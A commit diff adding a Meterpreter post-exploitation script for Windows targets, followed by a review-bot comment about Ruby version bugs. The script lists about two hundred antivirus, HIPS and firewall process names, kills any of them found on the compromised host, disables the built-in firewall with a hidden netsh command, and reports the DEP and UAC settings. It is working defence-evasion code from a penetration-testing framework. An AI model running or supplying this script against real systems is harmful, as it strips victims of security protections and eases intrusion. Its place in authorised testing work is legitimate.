getcountermeasure.rb script from Carlos Perez (detect/disable AV/HIPS/FWs/etc)
git-svn-id: file:///home/svn/framework3/trunk@6390 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
970d30cd45
commit
5f5dfbf823
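--- a/getcountermeasure.rb
+++ b/getcountermeasure.rb
@@ -0,0 +1,426 @@
+#!/usr/bin/env ruby
+
+#Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration.
+#Provides also the option to kill the processes of detected products and disable the built-in firewall.
+#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
+#Verion: 0.1.0
+session = client
+@@exec_opts = Rex::Parser::Arguments.new(
+"-h" => [ false, "Help menu." ],
+"-k" => [ false, "Kill any AV, HIPS and Third Party Firewall process found." ],
+"-d" => [ false, "Disable built in Firewall"]
+
+)
+#---------------------------------------------------------------------------------------------------------
+avs = %W{
+a2adguard.exe
+a2adwizard.exe
+a2antidialer.exe
+a2cfg.exe
+a2cmd.exe
+a2free.exe
+a2guard.exe
+a2hijackfree.exe
+a2scan.exe
+a2service.exe
+a2start.exe
+a2sys.exe
+a2upd.exe
+aavgapi.exe
+aawservice.exe
+aawtray.exe
+ad-aware.exe
+ad-watch.exe
+alescan.exe
+anvir.exe
+ashdisp.exe
+ashmaisv.exe
+ashserv.exe
+ashwebsv.exe
+aswupdsv.exe
+atrack.exe
+avgagent.exe
+avgamsvr.exe
+avgcc.exe
+avgctrl.exe
+avgemc.exe
+avgnt.exe
+avgtcpsv.exe
+avguard.exe
+avgupsvc.exe
+avgw.exe
+avkbar.exe
+avk.exe
+avkpop.exe
+avkproxy.exe
+avkservice.exe
+avktray
+avktray.exe
+avkwctl
+avkwctl.exe
+avmailc.exe
+avp.exe
+avpm.exe
+avpmwrap.exe
+avsched32.exe
+avwebgrd.exe
+avwin.exe
+avwupsrv.exe
+avz.exe
+bdagent.exe
+bdmcon.exe
+bdnagent.exe
+bdss.exe
+bdswitch.exe
+blackd.exe
+blackice.exe
+blink.exe
+boc412.exe
+boc425.exe
+bocore.exe
+bootwarn.exe
+cavrid.exe
+cavtray.exe
+ccapp.exe
+ccevtmgr.exe
+ccimscan.exe
+ccproxy.exe
+ccpwdsvc.exe
+ccpxysvc.exe
+ccsetmgr.exe
+cfgwiz.exe
+cfp.exe
+clamd.exe
+clamservice.exe
+clamtray.exe
+cmdagent.exe
+cpd.exe
+cpf.exe
+csinsmnt.exe
+dcsuserprot.exe
+defensewall.exe
+defensewall_serv.exe
+defwatch.exe
+f-agnt95.exe
+fpavupdm.exe
+f-prot95.exe
+f-prot.exe
+fprot.exe
+fsaua.exe
+fsav32.exe
+f-sched.exe
+fsdfwd.exe
+fsm32.exe
+fsma32.exe
+fssm32.exe
+f-stopw.exe
+f-stopw.exe
+fwservice.exe
+fwsrv.exe
+iamstats.exe
+iao.exe
+icload95.exe
+icmon.exe
+idsinst.exe
+idslu.exe
+inetupd.exe
+irsetup.exe
+isafe.exe
+isignup.exe
+issvc.exe
+kav.exe
+kavss.exe
+kavsvc.exe
+klswd.exe
+kpf4gui.exe
+kpf4ss.exe
+livesrv.exe
+lpfw.exe
+mcagent.exe
+mcdetect.exe
+mcmnhdlr.exe
+mcrdsvc.exe
+mcshield.exe
+mctskshd.exe
+mcvsshld.exe
+mghtml.exe
+mpftray.exe
+msascui.exe
+mscifapp.exe
+msfwsvc.exe
+msgsys.exe
+msssrv.exe
+navapsvc.exe
+navapw32.exe
+navlogon.dll
+navstub.exe
+navw32.exe
+nisemsvr.exe
+nisum.exe
+nmain.exe
+noads.exe
+nod32krn.exe
+nod32kui.exe
+nod32ra.exe
+npfmntor.exe
+nprotect.exe
+nsmdtr.exe
+oasclnt.exe
+ofcdog.exe
+opscan.exe
+outpost.exe
+paamsrv.exe
+pavfnsvr.exe
+pcclient.exe
+pccpfw.exe
+pccwin98.exe
+persfw.exe
+protector.exe
+qconsole.exe
+qdcsfs.exe
+rtvscan.exe
+sadblock.exe
+safe.exe
+sandboxieserver.exe
+savscan.exe
+sbiectrl.exe
+sbiesvc.exe
+sbserv.exe
+scfservice.exe
+sched.exe
+schedm.exe
+scheduler daemon.exe
+sdhelp.exe
+serv95.exe
+sgbhp.exe
+sgmain.exe
+slee503.exe
+smartfix.exe
+smc.exe
+snoopfreesvc.exe
+snoopfreeui.exe
+spbbcsvc.exe
+sp_rsser.exe
+spyblocker.exe
+spybotsd.exe
+spysweeper.exe
+spysweeperui.exe
+spywareguard.dll
+spywareterminatorshield.exe
+ssu.exe
+steganos5.exe
+stinger.exe
+swdoctor.exe
+swupdate.exe
+symlcsvc.exe
+symundo.exe
+symwsc.exe
+symwscno.exe
+tcguard.exe
+tds2-98.exe
+tds-3.exe
+teatimer.exe
+tgbbob.exe
+tgbstarter.exe
+tsatudt.exe
+umxagent.exe
+umxcfg.exe
+umxfwhlp.exe
+umxlu.exe
+umxpol.exe
+umxtray.exe
+usrprmpt.exe
+vetmsg9x.exe
+vetmsg.exe
+vptray.exe
+vsaccess.exe
+vsserv.exe
+wcantispy.exe
+win-bugsfix.exe
+winpatrol.exe
+winpatrolex.exe
+wrsssdk.exe
+xcommsvr.exe
+xfr.exe
+xp-antispy.exe
+zegarynka.exe
+zlclient.exe
+}
+#---------------------------------------------------------------------------------------------------------
+#Function for checking for the presence of AV, HIPS and Third Party Firewalls and/or kill the processes associated to it
+def check(session,avs,killbit)
+print_status("Checking for contermeasures...")
+client.sys.process.get_processes().each do |x|
+if (avs.index(x['name'].downcase))
+print_status("\tPossible countermeasure found #{x['name']} #{x['path']}")
+if (killbit == 1)
+print_status("\tKilling process for countermeasure.....")
+session.sys.process.kill(x['pid'])
+end
+end
+end
+end
+#---------------------------------------------------------------------------------------------------------
+#Function for getting the configuration and/or disabling the built in Windows Firewall
+def checklocalfw(session,killfw)
+# Expand enviroment %TEMP% variable
+tmp = session.fs.file.expand_path("%TEMP%")
+# Create random name for the netsh output
+fwfile = sprintf("%.5d",rand(100000))
+fwout = "#{tmp}\\#{fwfile}"
+print_status("Getting Windows Built in Firewall configuration...")
+opmode = ""
+r = session.sys.process.execute("cmd.exe /c netsh firewall show opmode >> #{fwout}", nil, {'Hidden' => 'true'})
+sleep(2)
+r = session.sys.process.execute("cmd.exe /c type #{fwout}", nil, {'Hidden' => 'true','Channelized' => true})
+while(d = r.channel.read)
+opmode << d
+end
+r.channel.close
+r.close
+opmode.split("\n").each do |o|
+print_status("\t#{o}")
+end
+if (killfw == 1)
+print_status("Disabling Built in Firewall.....")
+f = session.sys.process.execute("cmd.exe /c netsh firewall set opmode mode=DISABLE", nil, {'Hidden' => 'true','Channelized' => true})
+while(d = f.channel.read)
+if d =~ /The requested operation requires elevation./
+print_status("\tUAC or Insufficient permissions prevented the disabling of Firewal")
+end
+end
+f.channel.close
+f.close
+end
+end
+#---------------------------------------------------------------------------------------------------------
+# Function for getting the current DEP Policy on the Windows Target
+def checkdep(session)
+tmpout = ""
+depmode = ""
+# Expand enviroment %TEMP% variable
+tmp = session.fs.file.expand_path("%TEMP%")
+# Create random name for the wmic output
+wmicfile = sprintf("%.5d",rand(100000))
+wmicout = "#{tmp}\\#{wmicfile}"
+print_status("Checking DEP Support Policy...")
+r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicout} OS Get DataExecutionPrevention_SupportPolicy", nil, {'Hidden' => true})
+sleep(2)
+r.close
+r = session.sys.process.execute("cmd.exe /c type #{wmicout}", nil, {'Hidden' => 'true','Channelized' => true})
+while(d = r.channel.read)
+tmpout << d
+end
+r.channel.close
+r.close
+session.sys.process.execute("cmd.exe /c del #{wmicout}", nil, {'Hidden' => true})
+depmode = tmpout.scan(/(\d)/)
+if depmode.to_s == "0"
+print_status("\tDEP is off for the whole system.")
+elsif depmode.to_s == "1"
+print_status("\tFull DEP coverage for the whole system with no exceptions.")
+elsif depmode.to_s == "2"
+print_status("\tDEP is limited to Windows system binaries.")
+elsif depmode.to_s == "3"
+print_status("\tDEP is on for all programs and services.")
+end
+
+end
+#---------------------------------------------------------------------------------------------------------
+def checkuac(session)
+print_status("Checking if UAC is enaled ...")
+key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\System'
+root_key, base_key = session.sys.registry.splitkey(key)
+value = "EnableLUA"
+open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
+v = open_key.query_value(value)
+if v.data == 1
+print_status("\tUAC is Enabled")
+else
+print_status("\tUAC is Disabled")
+end
+end
+#---------------------------------------------------------------------------------------------------------
+#Function for identifying the version of windows
+def winver(session)
+stringtest = ""
+verout = []
+tmp = session.fs.file.expand_path("%TEMP%")
+wmitmptxt = tmp + "\\" + sprintf("%.5d",rand(100000))
+
+r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
+while(d = r.channel.read)
+stringtest << d
+end
+r.channel.close
+r.close
+
+verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
+version = nil
+if verout[0] == "6"
+if verout[1] == "0"
+r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmitmptxt} os get name", nil, {'Hidden' => true})
+sleep(2)
+# Read the output file of the wmic commands
+r = session.sys.process.execute("cmd.exe /c type #{wmitmptxt}", nil, {'Hidden' => 'true','Channelized' => true})
+while(d = r.channel.read)
+if d =~ /Windows Serverr 2008/
+version = "Windows 2008"
+elsif d =~ /Windows Vista/
+version = "Windows Vista"
+end
+end
+r.channel.close
+r.close
+elsif verout[1] == "1"
+version = "Windpows 7"
+end
+elsif verout [0] == "5"
+if verout[1] == "0"
+version = "Windows 2000"
+elsif verout[1] == "1"
+version = "Windows XP"
+elsif verout[1] == "2"
+version = "Windows 2003"
+end
+end
+version
+end
+
+################## MAIN ##################
+# Parsing of Options
+killbt = 0
+killfw = 0
+hlp = 0
+@@exec_opts.parse(args) { |opt, idx, val|
+case opt
+
+when "-k"
+killbt = 1
+when "-d"
+killfw = 1
+when "-h"
+hlp = 1
+print(
+"Getcountermeasure Meterpreter Script\n" +
+@@exec_opts.usage
+)
+break
+
+end
+
+}
+#---------------------------------------------------------------------------------------------------------
+#get the version of windows
+wnvr = winver(session)
+if (hlp == 0)
+print_status("Running Getcountermeasure on the target...")
+check(session,avs,killbt)
+if not wnvr == "Windows 2000"
+checklocalfw(session,killfw)
+checkdep(session)
+end
+if wnvr == "Windows Vista"
+checkuac(session)
+end
+end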
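Review bot: In checkdep, `depmode = tmpout.scan(/(\d)/)` produces an array of capture arrays (e.g. `[["1"]]`), so the `depmode.to_s == "0"` … `"3"` comparisons only hold under Ruby 1.8's `Array#to_s`; on 1.9+ `to_s` yields `"[[\"1\"]]"`, every branch is skipped, and the DEP policy is silently left unreported. Extract the digit as a string instead, `depmode = tmpout[/\d/]`, then branch on it with `case depmode` / `when "0"` … `when "3"`, and add an `else` that prints the raw wmic output so an unexpected value is visible rather than dropped. winver relies on the same scan shape: `verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)` assigns the whole first match to `verout` and nil to `minor`/`major`, which only works by coincidence and raises NoMethodError at `verout[0]` when `ver` output does not match; `verout = stringtest.scan(...).first` plus a `return nil unless verout` guard states the intent and fails cleanly. Separately, the regex `/Windows Serverr 2008/` in winver contains a typo and can never match, so Server 2008 hosts fall through with `version` still nil.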